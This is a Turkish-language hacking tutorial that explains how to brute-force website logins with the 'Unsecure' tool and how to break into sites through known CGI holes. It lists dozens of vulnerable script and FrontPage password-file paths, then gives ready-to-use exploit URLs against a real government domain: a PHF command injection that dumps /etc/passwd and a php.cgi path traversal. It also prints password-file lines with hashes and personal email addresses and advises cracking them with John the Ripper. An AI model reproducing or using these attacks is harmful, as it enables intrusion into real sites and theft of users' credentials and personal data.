UNSECURE

Kullanim olarakda oldukca basit olan bir webhack programıdır

 

Tanıtım

Computer Ip:Buraya baglanacagimiz sitenin ip no'sunu yaziyoruz.(İp no'sunu Cute Ftp programından sitenin url'sini yazarak bulabilirsiniz)

Port:Değiştirmeyin

Current Password: Değiştirmeyin

Username:Sitenin kullanıcı ismini giriyoruz.

Dictionray File: Burayı değiştirmiyoruz.

Attack Options:Dictionary Attack'ı secip BruteForce secenegini kapıyoruz.

Custom character sets:Bunu seciyoruz bütün karakterleri dener.

Number of Charecters to Start on:Burdada kac karakterden baslayacagnız secilir.Örnegin;freeservers en az 6 haneli oldugu icin 6'yı seciniz.

 

Kullanım

 

Program sifresini ögrenmek istedigimiz sitenin sizin sectiginiz kullanıcı ismine değişik sifreler deniyerek baglanmaya calısıyor.Denediği sifreleri unsdic.txt adlı dosyaya kaydediyor.

Program verdigniz kullanıcı adının sifresini deneme yanılma yöntemiyle kırmaya calısır.Sizin verdigniz wordlistleride teker teker dener ve wordlistin icinde sayfanın sifresi varsa size haber verir ve sifreyi gösterir

 

CGİ-AÇIKLARI

Web sitelerini CGI açıklarından faydalanarak kırmanın iki yolu vardır.

1-) Yol: Bilindik CGI'ları browser'ımızın adres satırına yazarak manuel olarak ararız. Bilindik CGI ve diğer script açıkları şöyle:

 

aglimpse > /cgi-bin/aglimpse

AnyForm2 > /cgi-bin/AnyForm2

args.bat > /cgi-dos/args.bat

AT-admin > /cgi-bin/AT-admin.cgi

bnbform.cgi > /cgi-bin/bnbform.cgi

campas > /cgi-bin/campas

carbo.dll > /carbo.dll

CGImail.exe > /scripts/CGImail.exe

cgiwrap > /cgi-bin/cgiwrap

classifieds.cgi > /cgi-bin/classifieds.cgi

Count.cgi > /cgi-bin/Count.cgi

displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm

docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp

edit.pl > /cgi-bin/edit.pl

environ.cgi > /cgi-bin/environ.cgi

exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm

Fax Survey > /cgi-bin/faxsurvey

filemail.pl > /cgi-bin/filemail.pl

files.pl > /cgi-bin/files.pl

Finger > /cgi-bin/finger

fpcount.exe > /scripts/fpcount.exe

glimpse > /cgi-bin/glimpse

guestbook.cgi > /cgi-bin/guestbook.cgi

Handler > /cgi-bin/handler

howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp

HTML Script > /cgi-bin/htmlscript

HTIMAGE > cgi-bin/htimage.exe

info2www > /cgi-bin/info2www

issadmin/bir.htr > /scripts/issadmin/bdir.htr

jj > /cgi-bin/jj

maillist.pl > /cgi-bin/maillist.pl

man.sh > /cgi-bin/man.sh

newdsn.exe > /scripts/tools/newdsn.exe

nph-publish > /cgi-bin/nph-publish

nph-test-cgi > /cgi-bin/nph-test-cgi

openfile.cfm > /cfdocs/expelval/openfile.cfm

perl.exe > /cgi-bin/perl.exe

perlshop.cgi > /cgi-bin/perlshop.cgi

PF Display > /cgi-bin/pfdispaly.cgi

PHF > /cgi-bin/phf

PHP > /cgi-bin/php.cgi

rguest.exe > /cgi-bin/rguest.exe

search97.vts > /search97.vts

sendmail.cfm > /cfdocs/expelval/sendmail.cfm

showcode.asp > /msads/Samples/SELECTOR/showcode.asp

survey.cgi > /cgi-bin/survey.cgi

Test-CGI > /cgi-bin/test-cgi

textcounter.pl > /cgi-bin/textcounter.pl

THC - Backdoor > /cgi-bin/rwwwshell.pl

uploader.exe > /cgi-win/uploader.exe

view-source > /cgi-bin/view-source

view-source > /cgi-bin/view-source

VTI BIN [shtml.dll] > /_vti_bin/shtml.dll

VTI BIN [shtml.exe] > /_vti_bin/shtml.exe

VTI INF [_vti_inf.html] > /_vti_inf.html

VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd

VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd

VTI PVT [service.pwd] > /_vti_pvt/service.pwd

VTI PVT [users.pwd] > /_vti_pvt/users.pwd

Web Sendmail > /cgi-bin/websendmail

webdist.cgi > /cgi-bin/webdist.cgi

WebGais > /cgi-bin/webgais

wguest.exe > /cgi-bin/wguest.exe

wrap > /cgi-bin/wrap

www-sql > /cgi-bin/www-sql

wwwboard.pl > /cgi-bin/wwwboard.pl

 

2-) Yol: Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir.

Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.mit.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

yazarız (adres örnek olarak yazılmıştır. Herhangi bir art niyet yoktur;o))

Tabii çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:

 

slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/slasher:/bin/bash\par

mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/home/mcgreen:/bin/bash\par

abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,,:/home/abi98:/bin/bash\par

henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henner_:/bin/bash\par

 

Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız?

http://www.mit.gov.tr/_vti_pvt/services.pwd

yazarız.

İşte bir de PHP CGI örneği:

http://www.mit.gov.tr/cgi-bin/php.cgi?../../../etc/passwd

Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek.